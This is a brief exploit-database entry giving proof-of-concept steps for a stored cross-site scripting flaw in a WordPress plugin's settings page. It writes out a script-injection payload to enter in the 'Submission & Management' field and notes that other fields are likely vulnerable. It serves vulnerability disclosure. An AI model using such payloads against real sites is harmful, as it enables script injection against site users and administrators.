Share
## https://sploitus.com/exploit?id=WPEX-ID:E9FE3101-8033-4EEE-8B37-06856872E9EF
1. Go to https://example.com/wp-admin/admin.php?page=amen-options
2. Enter the payload: `"><script>alert(1)</script>` for the "Submission & Management"
3. Save the setting and see the XSS

Note: Other fields are likely vulnerable